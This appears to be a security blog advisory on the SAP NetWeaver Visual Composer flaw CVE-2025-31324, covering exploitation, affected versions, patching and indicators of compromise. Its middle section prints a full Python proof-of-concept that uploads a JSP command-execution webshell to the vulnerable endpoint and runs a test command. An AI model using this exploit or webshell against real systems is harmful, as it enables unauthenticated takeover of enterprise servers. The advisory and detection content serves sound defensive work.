Critical SAP Vulnerability CVE-2025-31324: What You Need to Know

In the fast-evolving world of cybersecurity, a new threat has emerged that demands immediate attention from organizations relying on SAP systems. The recently disclosed SAP vulnerability, CVE-2025-31324, has sent shockwaves through the enterprise landscape due to its critical severity and active exploitation in the wild. With a perfect CVSS score of 10.0, this flaw in SAP NetWeaver Visual Composer poses a significant risk, allowing unauthenticated attackers to compromise entire systems. In this article, we dive deep into the vulnerability, its impact, and the urgent steps organizations must take to protect their critical infrastructure.

• Understating CVE-2025-31324
• Proof of Concept – PoC
• Who’s at Risk?
• Patching
• Bigger Picture

A Perfect Storm: Understanding CVE-2025-31324

At its core, CVE-2025-31324 is an unrestricted file upload vulnerability in the SAP NetWeaver Visual Composer Metadata Uploader, specifically affecting the /developmentserver/metadatauploader endpoint. This flaw enables attackers to upload malicious files, such as JSP webshells (e.g., helper.jsp, cache.jsp), without requiring authentication. Once uploaded, these files can be accessed remotely, granting attackers the ability to execute arbitrary code and seize full control of the compromised system.

The vulnerability’s unauthenticated nature makes it particularly dangerous, as no credentials are needed to exploit it. Attackers can craft POST requests to upload webshells, which are then accessible via GET requests, enabling remote command execution. The consequences are dire: compromised confidentiality, integrity, and availability of critical SAP systems, which are often the backbone of enterprise operations.

Security researchers have noted advanced exploitation techniques, including the deployment of Brute Ratel, a sophisticated command-and-control (C2) framework, and Heaven’s Gate, a memory manipulation tactic to evade detection. Attackers have also been observed uploading C# code, compiling it with MSBuild, and injecting it into dllhost.exe for persistence, showcasing the vulnerability’s potential for advanced persistent threats (APTs).

Proof of Concept (example):

python CVE-2025-31324_PoC.py http://test-sap-server:50000

import requests
import sys

# Target SAP NetWeaver server details (replace with test environment values)
TARGET_URL = "http://<target-sap-server>:50000/developmentserver/metadatauploader"
WEBSHELL_NAME = "helper.jsp"

# Malicious JSP webshell payload
# This creates a simple webshell allowing command execution via a GET parameter 'cmd'
WEBSHELL_PAYLOAD = """
<%@ page import="java.io.*" %>
<% 
    String cmd = request.getParameter("cmd");
    if (cmd != null) {
        Process p = Runtime.getRuntime().exec(cmd);
        BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));
        String line;
        while ((line = br.readLine()) != null) {
            out.println(line);
        }
        br.close();
    }
%>
"""

def upload_webshell():
    """Upload the malicious JSP webshell to the vulnerable endpoint."""
    files = {
        "file": (WEBSHELL_NAME, WEBSHELL_PAYLOAD, "application/octet-stream")
    }
    try:
        print(f"[*] Attempting to upload webshell to {TARGET_URL}")
        response = requests.post(TARGET_URL, files=files, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Webshell uploaded successfully! Access it at: {TARGET_URL}/{WEBSHELL_NAME}")
            return True
        else:
            print(f"[-] Upload failed. Status code: {response.status_code}")
            return False
    except requests.RequestException as e:
        print(f"[-] Error during upload: {e}")
        return False

def test_webshell():
    """Test the uploaded webshell by executing a simple command."""
    test_url = f"{TARGET_URL}/{WEBSHELL_NAME}?cmd=whoami"
    try:
        print(f"[*] Testing webshell with command: whoami")
        response = requests.get(test_url, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Webshell is active! Response:\n{response.text}")
        else:
            print(f"[-] Webshell test failed. Status code: {response.status_code}")
    except requests.RequestException as e:
        print(f"[-] Error during test: {e}")

def main():
    """Main function to execute the PoC."""
    print("[*] CVE-2025-31324 PoC - SAP NetWeaver Visual Composer Unrestricted File Upload")
    print("[*] For authorized penetration testing only in a controlled environment.")
    
    # Step 1: Upload the webshell
    if upload_webshell():
        # Step 2: Test the webshell if upload succeeds
        test_webshell()
    else:
        print("[-] PoC execution failed.")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python CVE-2025-31324_PoC.py <target_sap_server>")
        print("Example: python CVE-2025-31324_PoC.py http://test-sap-server:50000")
        sys.exit(1)
    
    TARGET_URL = sys.argv[1] + "/developmentserver/metadatauploader"
    main()

Proof of Concept: A Double-Edged Sword

For authorized penetration testers, public proof-of-concept (PoC) exploits are available on GitHub, with at least 11 repositories documented on platforms like cvefeed.io. Notably, Onapsis Research Labs released an open-source scanner on April 27, 2025, under the Apache License 2.0, enabling non-intrusive detection of the vulnerable component and patch status.

While these PoCs are invaluable for controlled testing in isolated environments, they also highlight the ease of exploitation. Ethical testers must use these tools responsibly, ensuring compliance with legal and regulatory standards, such as GDPR, SOX, and FDA, to avoid unintended consequences.

Who’s at Risk?

The vulnerability affects all SAP NetWeaver 7.xx versions, regardless of Support Package Stacks (SPS). Organizations running unsupported versions, such as SAP NetWeaver Application Server Java 7.40 or below, face heightened risks, as these systems no longer receive security updates. Given SAP’s widespread use in industries like finance, manufacturing, and healthcare, the potential impact spans critical business operations globally.

Security firms, including Onapsis, ReliaQuest, and Tenable, have confirmed active exploitation since at least April 22, 2025. With 28.3% of vulnerabilities exploited within 24 hours of disclosure in Q1 2025, this zero-day flaw represents an urgent threat to unpatched systems.

The Patch: Act Now or Pay the Price

On April 24, 2025, SAP released an emergency patch through Security Note 3594142, addressing the vulnerability. Organizations must apply this patch immediately to mitigate the risk of exploitation. For systems where immediate patching isn’t feasible, SAP recommends temporary mitigations, including:

• Disabling the Visual Composer component if it’s not in use.
• Blocking access to the /developmentserver/metadatauploader endpoint at the network level.
• Monitoring for indicators of compromise (IOCs), such as:
  • Webshell files: helper.jsp (SHA-256: 1f72bd2643995fab4ecf7150b6367fa1b3fab17afd2abed30a98f075e4913087)
  • Webshell files: cache.jsp (SHA-256: 794cb0a92f51e1387a6b316b8b5ff83d33a51ecf9bf7cc8e88a619ecb64f1dcf)

Proactive organizations should also integrate threat hunting and red-blue team exercises to validate patch effectiveness and enhance detection capabilities. Monitoring for suspicious JSP file uploads and deploying detection rules in security operations centers (SOCs) are critical steps to bolster defenses.

Why This Matters: The Bigger Picture

The rapid weaponization of CVE-2025-31324 underscores the growing sophistication of cyber threats targeting enterprise systems. With SAP systems handling sensitive business data, a successful exploit could lead to data breaches, regulatory fines, and reputational damage. Organizations must prioritize patching and adopt a defense-in-depth strategy, combining network restrictions, continuous monitoring, and simulated attack scenarios to stay ahead of adversaries.

As a cybersecurity expert, I recommend conducting risk assessments to identify vulnerable systems and document mitigation efforts for compliance. Collaboration between red and blue teams can further strengthen resilience, ensuring that defenses are tested and refined against real-world attack techniques.

Conclusion: Don’t Wait for the Breach

CVE-2025-31324 is a wake-up call for organizations relying on SAP NetWeaver. With active exploitation, public PoCs, and a perfect CVSS score, the time to act is now. By applying the emergency patch, monitoring for IOCs, and leveraging authorized testing tools, businesses can safeguard their critical assets and maintain operational integrity.

Stay vigilant, patch promptly, and fortify your defenses. In the world of cybersecurity, preparation is the key to resilience.

Key Citations

• SAP Security Notes and News Page
• Onapsis Active Exploitation Blog
• ReliaQuest Threat Spotlight Report
• The Hacker News SAP NetWeaver Flaw Article
• cvefeed.io CVE-2025-31324 Detail
• NVD CVE-2025-31324 Detail